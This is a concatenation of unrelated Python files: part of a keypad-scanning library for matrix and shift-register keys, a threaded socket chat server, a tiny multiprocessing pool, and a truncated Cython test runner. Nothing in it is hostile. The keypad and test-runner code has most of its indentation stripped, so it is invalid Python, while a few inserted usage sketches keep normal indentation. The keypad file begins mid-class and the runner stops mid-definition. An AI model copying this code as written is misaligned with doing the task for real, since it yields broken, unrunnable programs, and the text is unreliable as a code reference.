def reset(self):
"""Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._currently_pressed = self._previously_pressed = [False] * self.key_count
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return len(self._digitalinouts)
def _keypad_keys_scan(self):
for key_number, dio in enumerate(self._digitalinouts):
self._previously_pressed[key_number] = self._currently_pressed[key_number]
current = dio.value == self._value_when_pressed
self._currently_pressed[key_number] = current
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
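# Usage sketch (assumes a Blinka-compatible "board" module; the pin names D1 and
# D2 are hypothetical and board-specific). Defined here only as an example.
def _example_keys_usage():
    import board  # provided by Adafruit Blinka on supported hosts
    keys = Keys((board.D1, board.D2), value_when_pressed=False, pull=True)
    while True:
        event = keys.events.get()
        if event and event.pressed:
            print("key", event.key_number, "pressed")
        time.sleep(0.01)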
class KeyMatrix(_KeysBase):
"""Manage a 2D matrix of keys with row and column pins."""
# pylint: disable=too-many-arguments
def __init__(
self,
row_pins,
column_pins,
columns_to_anodes=True,
interval=0.02,
max_events=64,
):
"""
Create a `Keys` object that will scan the key matrix attached to the given row and
column pins.
There should not be any external pull-ups or pull-downs on the matrix:
``KeyMatrix`` enables internal pull-ups or pull-downs on the pins as necessary.
The keys are numbered sequentially from zero. A key number can be computed
by ``row * len(column_pins) + column``.
An `EventQueue` is created when this object is created and is available in the `events`
attribute.
:param Sequence[microcontroller.Pin] row_pins: The pins attached to the rows.
:param Sequence[microcontroller.Pin] column_pins: The pins attached to the columns.
:param bool columns_to_anodes: Default ``True``.
If the matrix uses diodes, the diode anodes are typically connected to the column pins,
and the cathodes should be connected to the row pins. If your diodes are reversed,
set ``columns_to_anodes`` to ``False``.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
self._row_digitalinouts = []
for row_pin in row_pins:
row_dio = digitalio.DigitalInOut(row_pin)
row_dio.switch_to_input(
pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
)
self._row_digitalinouts.append(row_dio)
self._column_digitalinouts = []
for column_pin in column_pins:
col_dio = digitalio.DigitalInOut(column_pin)
col_dio.switch_to_input(
pull=(digitalio.Pull.UP if columns_to_anodes else digitalio.Pull.DOWN)
)
self._column_digitalinouts.append(col_dio)
self._currently_pressed = [False] * len(column_pins) * len(row_pins)
self._previously_pressed = [False] * len(column_pins) * len(row_pins)
self._columns_to_anodes = columns_to_anodes
super().__init__(interval, max_events, self._keypad_keymatrix_scan)
# pylint: enable=too-many-arguments
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return len(self._row_digitalinouts) * len(self._column_digitalinouts)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
for row_dio in self._row_digitalinouts:
row_dio.deinit()
for col_dio in self._column_digitalinouts:
col_dio.deinit()
def reset(self):
"""
Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
self._previously_pressed = self._currently_pressed = [False] * self.key_count
def _row_column_to_key_number(self, row, column):
return row * len(self._column_digitalinouts) + column
def _keypad_keymatrix_scan(self):
for row, row_dio in enumerate(self._row_digitalinouts):
row_dio.switch_to_output(
value=(not self._columns_to_anodes),
drive_mode=digitalio.DriveMode.PUSH_PULL,
)
for col, col_dio in enumerate(self._column_digitalinouts):
key_number = self._row_column_to_key_number(row, col)
self._previously_pressed[key_number] = self._currently_pressed[
key_number
]
current = col_dio.value != self._columns_to_anodes
self._currently_pressed[key_number] = current
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
row_dio.value = self._columns_to_anodes
row_dio.switch_to_input(
pull=(
digitalio.Pull.UP
if self._columns_to_anodes
else digitalio.Pull.DOWN
)
)
class ShiftRegisterKeys(_KeysBase):
"""Manage a set of keys attached to an incoming shift register."""
def __init__(
self,
*,
clock,
data,
latch,
value_to_latch=True,
key_count,
value_when_pressed,
interval=0.02,
max_events=64
):
"""
Create a `Keys` object that will scan keys attached to a parallel-in serial-out
shift register like the 74HC165 or CD4021.
Note that you may chain shift registers to load in as many values as you need.
Key number 0 is the first (or more properly, the zero-th) bit read. In the
74HC165, this bit is labeled ``Q7``. Key number 1 will be the value of ``Q6``, etc.
An `EventQueue` is created when this object is created and is available in the
`events` attribute.
:param microcontroller.Pin clock: The shift register clock pin.
The shift register should clock on a low-to-high transition.
:param microcontroller.Pin data: the incoming shift register data pin
:param microcontroller.Pin latch:
Pin used to latch parallel data going into the shift register.
:param bool value_to_latch: Pin state to latch data being read.
``True`` if the data is latched when ``latch`` goes high
``False`` if the data is latched when ``latch`` goes low.
The default is ``True``, which is how the 74HC165 operates. The CD4021 latch is
the opposite. Once the data is latched, it will be shifted out by toggling the
clock pin.
:param int key_count: number of data lines to clock in
:param bool value_when_pressed: ``True`` if the pin reads high when the key is pressed.
``False`` if the pin reads low (is grounded) when the key is pressed.
:param float interval: Scan keys no more often than ``interval`` to allow for debouncing.
``interval`` is in float seconds. The default is 0.020 (20 msecs).
:param int max_events: maximum size of `events` `EventQueue`:
maximum number of key transition events that are saved.
Must be >= 1.
If a new event arrives when the queue is full, the oldest event is discarded.
"""
clock_dio = digitalio.DigitalInOut(clock)
clock_dio.switch_to_output(
value=False, drive_mode=digitalio.DriveMode.PUSH_PULL
)
self._clock = clock_dio
data_dio = digitalio.DigitalInOut(data)
data_dio.switch_to_input()
self._data = data_dio
latch_dio = digitalio.DigitalInOut(latch)
latch_dio.switch_to_output(value=True, drive_mode=digitalio.DriveMode.PUSH_PULL)
self._latch = latch_dio
self._value_to_latch = value_to_latch
self._currently_pressed = [False] * key_count
self._previously_pressed = [False] * key_count
self._value_when_pressed = value_when_pressed
self._key_count = key_count
super().__init__(interval, max_events, self._keypad_shiftregisterkeys_scan)
def deinit(self):
"""Stop scanning and release the pins."""
super().deinit()
self._clock.deinit()
self._data.deinit()
self._latch.deinit()
def reset(self):
"""
Reset the internal state of the scanner to assume that all keys are now released.
Any key that is already pressed at the time of this call will therefore immediately cause
a new key-pressed event to occur.
"""
        self._previously_pressed = [False] * self._key_count
        self._currently_pressed = [False] * self._key_count
@property
def key_count(self):
"""The number of keys that are being scanned. (read-only)"""
return self._key_count
@property
def events(self):
"""The ``EventQueue`` associated with this `Keys` object. (read-only)"""
return self._events
def _keypad_shiftregisterkeys_scan(self):
self._latch.value = self._value_to_latch
for key_number in range(self._key_count):
self._clock.value = False
self._previously_pressed[key_number] = self._currently_pressed[key_number]
current = self._data.value == self._value_when_pressed
self._currently_pressed[key_number] = current
self._clock.value = True
if self._previously_pressed[key_number] != current:
self._events.keypad_eventqueue_record(key_number, current)
self._latch.value = not self._value_to_latch
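# --- Usage sketch (not part of the library above) ----------------------------
# A minimal example of how ShiftRegisterKeys might be wired up. The pin names
# (board.GP2 and friends) are hypothetical and board-specific, and the polling
# loop assumes the EventQueue stored in ``events`` offers a CircuitPython-style
# ``get()`` returning events with ``key_number`` and ``pressed`` attributes.
#
#     import board
#
#     keys = ShiftRegisterKeys(
#         clock=board.GP2,
#         data=board.GP3,
#         latch=board.GP4,
#         key_count=8,
#         value_when_pressed=False,
#     )
#     while True:
#         event = keys.events.get()
#         if event:
#             print("key", event.key_number, "pressed" if event.pressed else "released")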
|
server.py
|
import socket
import threading

PORT = 5060
FORMAT = 'utf-8'
SERVER_NAME = socket.gethostname()
IP_ADDRESS = socket.gethostbyname(SERVER_NAME)
ADDRESS_DEF = (IP_ADDRESS, PORT)
DISCONNECT_MESSAGE = '!DISCONECT'  # sentinel text a client sends to leave the channel
CLIENT_LIST = set()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(ADDRESS_DEF)

def message_recv_send(client_socket, client_address):
    """Receive messages from one client and broadcast them to all connected clients."""
    while True:
        try:
            message = client_socket.recv(1024).decode(FORMAT)
        except (ConnectionResetError, OSError):
            message = ''
        if not message or message == DISCONNECT_MESSAGE:
            print('{} has left the channel'.format(client_address))
            CLIENT_LIST.discard(client_socket)
            client_socket.close()
            break
        for cl in list(CLIENT_LIST):
            cl.send((client_address[0] + ":" + str(client_address[1]) + " says: " + message).encode(FORMAT))

def get_start():
    server.listen(2)
    print('Server listening on {}:{}'.format(IP_ADDRESS, PORT))
    while True:
        client_socket, client_address = server.accept()
        print('{} has joined the channel'.format(client_address))
        CLIENT_LIST.add(client_socket)
        thread = threading.Thread(target=message_recv_send, args=(client_socket, client_address))
        thread.start()

get_start()
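# --- Companion client sketch (illustrative; no client file is included here) --
# One way a client could talk to the server above: connect to the same host and
# port, send utf-8 text, and send the '!DISCONECT' sentinel to leave. A reader
# thread prints whatever the server broadcasts.
#
#     import socket
#     import threading
#
#     client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     client.connect((socket.gethostbyname(socket.gethostname()), 5060))
#
#     def listen():
#         while True:
#             data = client.recv(1024)
#             if not data:
#                 break
#             print(data.decode('utf-8'))
#
#     threading.Thread(target=listen, daemon=True).start()
#     while True:
#         line = input()
#         client.send(line.encode('utf-8'))
#         if line == '!DISCONECT':
#             break
#     client.close()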
|
mypool.py
|
# -*- coding: utf-8 -*-
from multiprocessing import Process, Pipe, cpu_count
class MyPool:
    """A minimal process pool that maps a function over a list of arguments."""
    proc_num = cpu_count()  # default: one worker process per CPU core
    def __init__(self, proc_num):
        self.proc_num = proc_num
    def map(self, func, args):
        # Worker entry point: compute one result and send it back through the pipe.
        def pipefunc(conn, arg):
            conn.send(func(arg))
            conn.close()
        ret = []
        k = 0
        # Process the arguments in batches of at most proc_num at a time.
        while k < len(args):
            plist = []  # processes of the current batch
            clist = []  # parent ends of the pipes, in argument order
            end = min(k + self.proc_num, len(args))
            for arg in args[k:end]:
                pconn, cconn = Pipe()
                plist.append(Process(target=pipefunc, args=(cconn, arg)))
                clist.append(pconn)
            for p in plist:
                p.start()
            # Collect the results before joining so a large payload cannot block a child.
            for conn in clist:
                ret.append(conn.recv())
            for p in plist:
                p.join()
            k += self.proc_num
        return ret
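# --- Usage sketch -------------------------------------------------------------
# A small, illustrative self-test (``square`` is not part of the original
# module). Note that map() uses the local closure pipefunc as the Process
# target, so this relies on the 'fork' start method (the Linux default) and
# will not work under 'spawn', where targets must be picklable.
def square(x):
    return x * x
if __name__ == '__main__':
    pool = MyPool(proc_num=4)
    print(pool.map(square, list(range(10))))  # -> [0, 1, 4, 9, 16, 25, 36, 49, 64, 81]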
|
runtests.py
|
#!/usr/bin/env python
from __future__ import print_function
import atexit
import base64
import os
import sys
import re
import gc
import heapq
import locale
import shutil
import time
import unittest
import doctest
import operator
import subprocess
import tempfile
import traceback
import warnings
import zlib
import glob
from contextlib import contextmanager
from collections import defaultdict
try:
import platform
IS_PYPY = platform.python_implementation() == 'PyPy'
IS_CPYTHON = platform.python_implementation() == 'CPython'
except (ImportError, AttributeError):
IS_CPYTHON = True
IS_PYPY = False
IS_PY2 = sys.version_info[0] < 3
from io import open as io_open
try:
from StringIO import StringIO
except ImportError:
from io import StringIO # doesn't accept 'str' in Py2
try:
import cPickle as pickle
except ImportError:
import pickle
try:
import threading
except ImportError: # No threads, no problems
threading = None
try:
from unittest import SkipTest
except ImportError:
class SkipTest(Exception): # don't raise, only provided to allow except-ing it!
pass
def skip_test(reason):
sys.stderr.write("Skipping test: %s\n" % reason)
else:
def skip_test(reason):
raise SkipTest(reason)
try:
basestring
except NameError:
basestring = str
WITH_CYTHON = True
from distutils.command.build_ext import build_ext as _build_ext
from distutils import sysconfig
_to_clean = []
@atexit.register
def _cleanup_files():
"""
This is only used on Cygwin to clean up shared libraries that are unsafe
to delete while the test suite is running.
"""
for filename in _to_clean:
if os.path.isdir(filename):
shutil.rmtree(filename, ignore_errors=True)
else:
try:
os.remove(filename)
except OSError:
pass
def get_distutils_distro(_cache=[]):
if _cache:
return _cache[0]
# late import to accommodate for setuptools override
from distutils.dist import Distribution
distutils_distro = Distribution()
if sys.platform == 'win32':
# TODO: Figure out why this hackery (see https://thread.gmane.org/gmane.comp.python.cython.devel/8280/).
config_files = distutils_distro.find_config_files()
try:
config_files.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(config_files)
cfgfiles = distutils_distro.find_config_files()
try:
cfgfiles.remove('setup.cfg')
except ValueError:
pass
distutils_distro.parse_config_files(cfgfiles)
_cache.append(distutils_distro)
return distutils_distro
EXT_DEP_MODULES = {
'tag:numpy': 'numpy',
'tag:pythran': 'pythran',
'tag:setuptools': 'setuptools.sandbox',
'tag:asyncio': 'asyncio',
'tag:pstats': 'pstats',
'tag:posix': 'posix',
'tag:array': 'array',
'tag:coverage': 'Cython.Coverage',
'Coverage': 'Cython.Coverage',
'tag:ipython': 'IPython.testing.globalipapp',
'tag:jedi': 'jedi_BROKEN_AND_DISABLED',
'tag:test.support': 'test.support', # support module for CPython unit tests
}
def patch_inspect_isfunction():
import inspect
orig_isfunction = inspect.isfunction
def isfunction(obj):
return orig_isfunction(obj) or type(obj).__name__ == 'cython_function_or_method'
isfunction._orig_isfunction = orig_isfunction
inspect.isfunction = isfunction
def unpatch_inspect_isfunction():
import inspect
try:
orig_isfunction = inspect.isfunction._orig_isfunction
except AttributeError:
pass
else:
inspect.isfunction = orig_isfunction
def def_to_cdef(source):
'''
Converts the module-level def methods into cdef methods, i.e.
@decorator
def foo([args]):
"""
[tests]
"""
[body]
becomes
def foo([args]):
"""
[tests]
"""
return foo_c([args])
cdef foo_c([args]):
[body]
'''
output = []
skip = False
def_node = re.compile(r'def (\w+)\(([^()*]*)\):').match
lines = iter(source.split('\n'))
for line in lines:
if not line.strip():
output.append(line)
continue
if skip:
if line[0] != ' ':
skip = False
else:
continue
if line[0] == '@':
skip = True
continue
m = def_node(line)
if m:
name = m.group(1)
args = m.group(2)
if args:
args_no_types = ", ".join(arg.split()[-1] for arg in args.split(','))
else:
args_no_types = ""
output.append("def %s(%s):" % (name, args_no_types))
line = next(lines)
if '"""' in line:
has_docstring = True
output.append(line)
for line in lines:
output.append(line)
if '"""' in line:
break
else:
has_docstring = False
output.append(" return %s_c(%s)" % (name, args_no_types))
output.append('')
output.append("cdef %s_c(%s):" % (name, args))
if not has_docstring:
output.append(line)
else:
output.append(line)
return '\n'.join(output)
def exclude_extension_in_pyver(*versions):
def check(ext):
return EXCLUDE_EXT if sys.version_info[:2] in versions else ext
return check
def exclude_extension_on_platform(*platforms):
def check(ext):
return EXCLUDE_EXT if sys.platform in platforms else ext
return check
def update_linetrace_extension(ext):
ext.define_macros.append(('CYTHON_TRACE', 1))
return ext
def update_numpy_extension(ext, set_api17_macro=True):
import numpy
from numpy.distutils.misc_util import get_info
ext.include_dirs.append(numpy.get_include())
if set_api17_macro and getattr(numpy, '__version__', '') not in ('1.19.0', '1.19.1'):
ext.define_macros.append(('NPY_NO_DEPRECATED_API', 'NPY_1_7_API_VERSION'))
# We need the npymath library for numpy.math.
# This is typically a static-only library.
for attr, value in get_info('npymath').items():
getattr(ext, attr).extend(value)
def update_gdb_extension(ext, _has_gdb=[None]):
# We should probably also check for Python support.
if not include_debugger:
_has_gdb[0] = False
if _has_gdb[0] is None:
try:
subprocess.check_call(["gdb", "--version"])
except (IOError, subprocess.CalledProcessError):
_has_gdb[0] = False
else:
_has_gdb[0] = True
if not _has_gdb[0]:
return EXCLUDE_EXT
return ext
def update_openmp_extension(ext):
ext.openmp = True
language = ext.language
if sys.platform == 'win32' and sys.version_info[:2] == (3,4):
# OpenMP tests fail in appveyor in Py3.4 -> just ignore them, EoL of Py3.4 is early 2019...
return EXCLUDE_EXT
if language == 'cpp':
flags = OPENMP_CPP_COMPILER_FLAGS
else:
flags = OPENMP_C_COMPILER_FLAGS
if flags:
compile_flags, link_flags = flags
ext.extra_compile_args.extend(compile_flags.split())
ext.extra_link_args.extend(link_flags.split())
return ext
elif sys.platform == 'win32':
return ext
return EXCLUDE_EXT
def update_cpp11_extension(ext):
"""
update cpp11 extensions that will run on versions of gcc >4.8
"""
gcc_version = get_gcc_version(ext.language)
if gcc_version:
compiler_version = gcc_version.group(1)
if float(compiler_version) > 4.8:
ext.extra_compile_args.append("-std=c++11")
return ext
clang_version = get_clang_version(ext.language)
if clang_version:
ext.extra_compile_args.append("-std=c++11")
if sys.platform == "darwin":
ext.extra_compile_args.append("-stdlib=libc++")
ext.extra_compile_args.append("-mmacosx-version-min=10.7")
return ext
return EXCLUDE_EXT
def get_cc_version(language):
"""
finds gcc version using Popen
"""
if language == 'cpp':
cc = sysconfig.get_config_var('CXX')
else:
cc = sysconfig.get_config_var('CC')
if not cc:
from distutils import ccompiler
cc = ccompiler.get_default_compiler()
if not cc:
return ''
# For some reason, cc can be e.g. 'gcc -pthread'
cc = cc.split()[0]
# Force english output
env = os.environ.copy()
env['LC_MESSAGES'] = 'C'
try:
p = subprocess.Popen([cc, "-v"], stderr=subprocess.PIPE, env=env)
except EnvironmentError:
# Be compatible with Python 3
warnings.warn("Unable to find the %s compiler: %s: %s" %
(language, os.strerror(sys.exc_info()[1].errno), cc))
return ''
_, output = p.communicate()
return output.decode(locale.getpreferredencoding() or 'ASCII', 'replace')
def get_gcc_version(language):
matcher = re.compile(r"gcc version (\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_clang_version(language):
matcher = re.compile(r"clang(?:-|\s+version\s+)(\d+\.\d+)").search
return matcher(get_cc_version(language))
def get_openmp_compiler_flags(language):
"""
As of gcc 4.2, it supports OpenMP 2.5. Gcc 4.4 implements 3.0. We don't
(currently) check for other compilers.
returns a two-tuple of (CFLAGS, LDFLAGS) to build the OpenMP extension
"""
gcc_version = get_gcc_version(language)
if not gcc_version:
if sys.platform == 'win32':
return '/openmp', ''
else:
return None # not gcc - FIXME: do something about other compilers
# gcc defines "__int128_t", assume that at least all 64 bit architectures have it
global COMPILER_HAS_INT128
COMPILER_HAS_INT128 = getattr(sys, 'maxsize', getattr(sys, 'maxint', 0)) > 2**60
compiler_version = gcc_version.group(1)
    # Compare version components numerically so that e.g. gcc 10.x sorts after 4.2.
    if compiler_version and [int(v) for v in compiler_version.split('.')] >= [4, 2]:
        return '-fopenmp', '-fopenmp'
try:
locale.setlocale(locale.LC_ALL, '')
except locale.Error:
pass
COMPILER = None
COMPILER_HAS_INT128 = False
OPENMP_C_COMPILER_FLAGS = get_openmp_compiler_flags('c')
OPENMP_CPP_COMPILER_FLAGS = get_openmp_compiler_flags('cpp')
# Return this from the EXT_EXTRAS matcher callback to exclude the extension
EXCLUDE_EXT = object()
EXT_EXTRAS = {
'tag:numpy' : update_numpy_extension,
'tag:openmp': update_openmp_extension,
'tag:gdb': update_gdb_extension,
'tag:cpp11': update_cpp11_extension,
'tag:trace' : update_linetrace_extension,
'tag:bytesformat': exclude_extension_in_pyver((3, 3), (3, 4)), # no %-bytes formatting
'tag:no-macos': exclude_extension_on_platform('darwin'),
'tag:py3only': exclude_extension_in_pyver((2, 7)),
}
# TODO: use tags
VER_DEP_MODULES = {
# tests are excluded if 'CurrentPythonVersion OP VersionTuple', i.e.
# (2,4) : (operator.lt, ...) excludes ... when PyVer < 2.4.x
# The next line should start (3,); but this is a dictionary, so
# we can only have one (3,) key. Since 2.7 is supposed to be the
# last 2.x release, things would have to change drastically for this
# to be unsafe...
(2,999): (operator.lt, lambda x: x in ['run.special_methods_T561_py3',
'run.test_raisefrom',
'run.different_package_names',
'run.unicode_imports', # encoding problems on appveyor in Py2
'run.reimport_failure', # reimports don't do anything in Py2
]),
(3,): (operator.ge, lambda x: x in ['run.non_future_division',
'compile.extsetslice',
'compile.extdelslice',
'run.special_methods_T561_py2',
]),
(3,3) : (operator.lt, lambda x: x in ['build.package_compilation',
'build.cythonize_pep420_namespace',
'run.yield_from_py33',
'pyximport.pyximport_namespace',
'run.qualname',
]),
(3,4): (operator.lt, lambda x: x in ['run.py34_signature',
'run.test_unicode', # taken from Py3.7, difficult to backport
]),
(3,4,999): (operator.gt, lambda x: x in ['run.initial_file_path',
]),
(3,5): (operator.lt, lambda x: x in ['run.py35_pep492_interop',
'run.py35_asyncio_async_def',
'run.mod__spec__',
'run.pep526_variable_annotations', # typing module
'run.test_exceptions', # copied from Py3.7+
'run.time_pxd', # _PyTime_GetSystemClock doesn't exist in 3.4
]),
}
INCLUDE_DIRS = [ d for d in os.getenv('INCLUDE', '').split(os.pathsep) if d ]
CFLAGS = os.getenv('CFLAGS', '').split()
CCACHE = os.getenv('CYTHON_RUNTESTS_CCACHE', '').split()
TEST_SUPPORT_DIR = 'testsupport'
BACKENDS = ['c', 'cpp']
UTF8_BOM_BYTES = r'\xef\xbb\xbf'.encode('ISO-8859-1').decode('unicode_escape')
def memoize(f):
uncomputed = object()
f._cache = {}
def func(*args):
res = f._cache.get(args, uncomputed)
if res is uncomputed:
res = f._cache[args] = f(*args)
return res
return func
@memoize
def parse_tags(filepath):
tags = defaultdict(list)
parse_tag = re.compile(r'#\s*(\w+)\s*:(.*)$').match
with io_open(filepath, encoding='ISO-8859-1', errors='ignore') as f:
for line in f:
# ignore BOM-like bytes and whitespace
line = line.lstrip(UTF8_BOM_BYTES).strip()
if not line:
if tags:
break # assume all tags are in one block
else:
continue
if line[0] != '#':
break
parsed = parse_tag(line)
if parsed:
tag, values = parsed.groups()
if tag in ('coding', 'encoding'):
continue
if tag == 'tags':
tag = 'tag'
print("WARNING: test tags use the 'tag' directive, not 'tags' (%s)" % filepath)
if tag not in ('mode', 'tag', 'ticket', 'cython', 'distutils', 'preparse'):
print("WARNING: unknown test directive '%s' found (%s)" % (tag, filepath))
values = values.split(',')
tags[tag].extend(filter(None, [value.strip() for value in values]))
elif tags:
break # assume all tags are in one block
return tags
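# Illustration (not part of the runner): a test file header that parse_tags()
# understands might start with a comment block such as
#
#     # mode: run
#     # tag: numpy, openmp
#     # ticket: 1234
#
# Values are comma-separated; parsing stops at the first non-comment line, or
# at the first blank line once any tag has been seen.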
list_unchanging_dir = memoize(lambda x: os.listdir(x)) # needs lambda to set function attribute
@memoize
def _list_pyregr_data_files(test_directory):
is_data_file = re.compile('(?:[.](txt|pem|db|html)|^bad.*[.]py)$').search
return ['__init__.py'] + [
filename for filename in list_unchanging_dir(test_directory)
if is_data_file(filename)]
def import_ext(module_name, file_path=None):
if file_path:
import imp
return imp.load_dynamic(module_name, file_path)
else:
try:
from importlib import invalidate_caches
except ImportError:
pass
else:
invalidate_caches()
return __import__(module_name, globals(), locals(), ['*'])
class build_ext(_build_ext):
def build_extension(self, ext):
try:
try: # Py2.7+ & Py3.2+
compiler_obj = self.compiler_obj
except AttributeError:
compiler_obj = self.compiler
if ext.language == 'c++':
compiler_obj.compiler_so.remove('-Wstrict-prototypes')
if CCACHE:
compiler_obj.compiler_so = CCACHE + compiler_obj.compiler_so
if getattr(ext, 'openmp', None) and compiler_obj.compiler_type == 'msvc':
ext.extra_compile_args.append('/openmp')
except Exception:
pass
_build_ext.build_extension(self, ext)
class ErrorWriter(object):
match_error = re.compile(r'(warning:)?(?:.*:)?\s*([-0-9]+)\s*:\s*([-0-9]+)\s*:\s*(.*)').match
def __init__(self, encoding=None):
self.output = []
self.encoding = encoding
def write(self, value):
if self.encoding:
value = value.encode('ISO-8859-1').decode(self.encoding)
self.output.append(value)
def _collect(self):
s = ''.join(self.output)
results = {'errors': [], 'warnings': []}
for line in s.splitlines():
match = self.match_error(line)
if match:
is_warning, line, column, message = match.groups()
results['warnings' if is_warning else 'errors'].append((int(line), int(column), message.strip()))
return [["%d:%d: %s" % values for values in sorted(results[key])] for key in ('errors', 'warnings')]
def geterrors(self):
return self._collect()[0]
def getwarnings(self):
return self._collect()[1]
def getall(self):
return self._collect()
def close(self):
pass # ignore, only to match file-like interface
class Stats(object):
def __init__(self, top_n=8):
self.top_n = top_n
self.test_counts = defaultdict(int)
self.test_times = defaultdict(float)
self.top_tests = defaultdict(list)
def add_time(self, name, language, metric, t):
self.test_counts[metric] += 1
self.test_times[metric] += t
top = self.top_tests[metric]
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
# min-heap => pop smallest/shortest until longest times remain
push(top, (t, name, language))
@contextmanager
def time(self, name, language, metric):
t = time.time()
yield
t = time.time() - t
self.add_time(name, language, metric, t)
def update(self, stats):
# type: (Stats) -> None
for metric, t in stats.test_times.items():
self.test_times[metric] += t
self.test_counts[metric] += stats.test_counts[metric]
top = self.top_tests[metric]
for entry in stats.top_tests[metric]:
push = heapq.heappushpop if len(top) >= self.top_n else heapq.heappush
push(top, entry)
def print_stats(self, out=sys.stderr):
if not self.test_times:
return
lines = ['Times:\n']
for metric, t in sorted(self.test_times.items()):
count = self.test_counts[metric]
top = self.top_tests[metric]
lines.append("%-12s: %8.2f sec (%4d, %6.3f / run) - slowest: %s\n" % (
metric, t, count, t / count,
', '.join("'{2}:{1}' ({0:.2f}s)".format(*item) for item in heapq.nlargest(self.top_n, top))))
out.write(''.join(lines))
class TestBuilder(object):
def __init__(self, rootdir, workdir, selectors, exclude_selectors, options,
with_pyregr, languages, test_bugs, language_level,
common_utility_dir, pythran_dir=None,
default_mode='run', stats=None,
add_embedded_test=False):
self.rootdir = rootdir
self.workdir = workdir
self.selectors = selectors
self.exclude_selectors = exclude_selectors
self.annotate = options.annotate_source
self.cleanup_workdir = options.cleanup_workdir
self.cleanup_sharedlibs = options.cleanup_sharedlibs
self.cleanup_failures = options.cleanup_failures
self.with_pyregr = with_pyregr
self.cython_only = options.cython_only
self.doctest_selector = re.compile(options.only_pattern).search if options.only_pattern else None
self.languages = languages
self.test_bugs = test_bugs
self.fork = options.fork
self.language_level = language_level
self.test_determinism = options.test_determinism
self.common_utility_dir = common_utility_dir
self.pythran_dir = pythran_dir
self.default_mode = default_mode
self.stats = stats
self.add_embedded_test = add_embedded_test
self.capture = options.capture
def build_suite(self):
suite = unittest.TestSuite()
filenames = os.listdir(self.rootdir)
filenames.sort()
# TODO: parallelise I/O with a thread pool for the different directories once we drop Py2 support
for filename in filenames:
path = os.path.join(self.rootdir, filename)
if os.path.isdir(path) and filename != TEST_SUPPORT_DIR:
if filename == 'pyregr' and not self.with_pyregr:
continue
if filename == 'broken' and not self.test_bugs:
continue
suite.addTest(
self.handle_directory(path, filename))
if (sys.platform not in ['win32'] and self.add_embedded_test
# the embedding test is currently broken in Py3.8+, except on Linux.
and (sys.version_info < (3, 8) or sys.platform != 'darwin')):
# Non-Windows makefile.
if [1 for selector in self.selectors if selector("embedded")] \
and not [1 for selector in self.exclude_selectors if selector("embedded")]:
suite.addTest(unittest.makeSuite(EmbedTest))
return suite
def handle_directory(self, path, context):
workdir = os.path.join(self.workdir, context)
if not os.path.exists(workdir):
os.makedirs(workdir)
suite = unittest.TestSuite()
filenames = list_unchanging_dir(path)
filenames.sort()
for filename in filenames:
filepath = os.path.join(path, filename)
module, ext = os.path.splitext(filename)
if ext not in ('.py', '.pyx', '.srctree'):
continue
if filename.startswith('.'):
continue # certain emacs backup files
if context == 'pyregr':
tags = defaultdict(list)
else:
tags = parse_tags(filepath)
fqmodule = "%s.%s" % (context, module)
if not [ 1 for match in self.selectors
if match(fqmodule, tags) ]:
continue
if self.exclude_selectors:
if [1 for match in self.exclude_selectors
if match(fqmodule, tags)]:
continue
mode = self.default_mode
if tags['mode']:
mode = tags['mode'][0]
elif context == 'pyregr':
mode = 'pyregr'
if ext == '.srctree':
if 'cpp' not in tags['tag'] or 'cpp' in self.languages:
suite.addTest(EndToEndTest(filepath, workdir,
self.cleanup_workdir, stats=self.stats,
capture=self.capture))
continue
# Choose the test suite.
if mode == 'pyregr':
if not filename.startswith('test_'):
continue
test_class = CythonPyregrTestCase
elif mode == 'run':
if module.startswith("test_"):
test_class = CythonUnitTestCase
else:
test_class = CythonRunTestCase
elif mode in ['compile', 'error']:
test_class = CythonCompileTestCase
else:
raise KeyError('Invalid test mode: ' + mode)
for test in self.build_tests(test_class, path, workdir,
module, mode == 'error', tags):
suite.addTest(test)
if mode == 'run' and ext == '.py' and not self.cython_only and not filename.startswith('test_'):
# additionally test file in real Python
min_py_ver = [
(int(pyver.group(1)), int(pyver.group(2)))
for pyver in map(re.compile(r'pure([0-9]+)[.]([0-9]+)').match, tags['tag'])
if pyver
]
if not min_py_ver or any(sys.version_info >= min_ver for min_ver in min_py_ver):
suite.addTest(PureDoctestTestCase(module, os.path.join(path, filename), tags, stats=self.stats))
return suite
def build_tests(self, test_class, path, workdir, module, expect_errors, tags):
warning_errors = 'werror' in tags['tag']
expect_warnings = 'warnings' in tags['tag']
if expect_errors:
if skip_c(tags) and 'cpp' in self.languages:
languages = ['cpp']
else:
languages = self.languages[:1]
else:
languages = self.languages
if 'c' in languages and skip_c(tags):
languages = list(languages)
languages.remove('c')
if 'cpp' in languages and 'no-cpp' in tags['tag']:
languages = list(languages)
languages.remove('cpp')
if not languages:
return []
language_levels = [2, 3] if 'all_language_levels' in tags['tag'] else [None]
pythran_dir = self.pythran_dir
if 'pythran' in tags['tag'] and not pythran_dir and 'cpp' in languages:
import pythran.config
try:
pythran_ext = pythran.config.make_extension(python=True)
except TypeError: # old pythran version syntax
pythran_ext = pythran.config.make_extension()
pythran_dir = pythran_ext['include_dirs'][0]
preparse_list = tags.get('preparse', ['id'])
tests = [ self.build_test(test_class, path, workdir, module, tags, language, language_level,
expect_errors, expect_warnings, warning_errors, preparse,
pythran_dir if language == "cpp" else None)
for language in languages
for preparse in preparse_list
for language_level in language_levels
]
return tests
def build_test(self, test_class, path, workdir, module, tags, language, language_level,
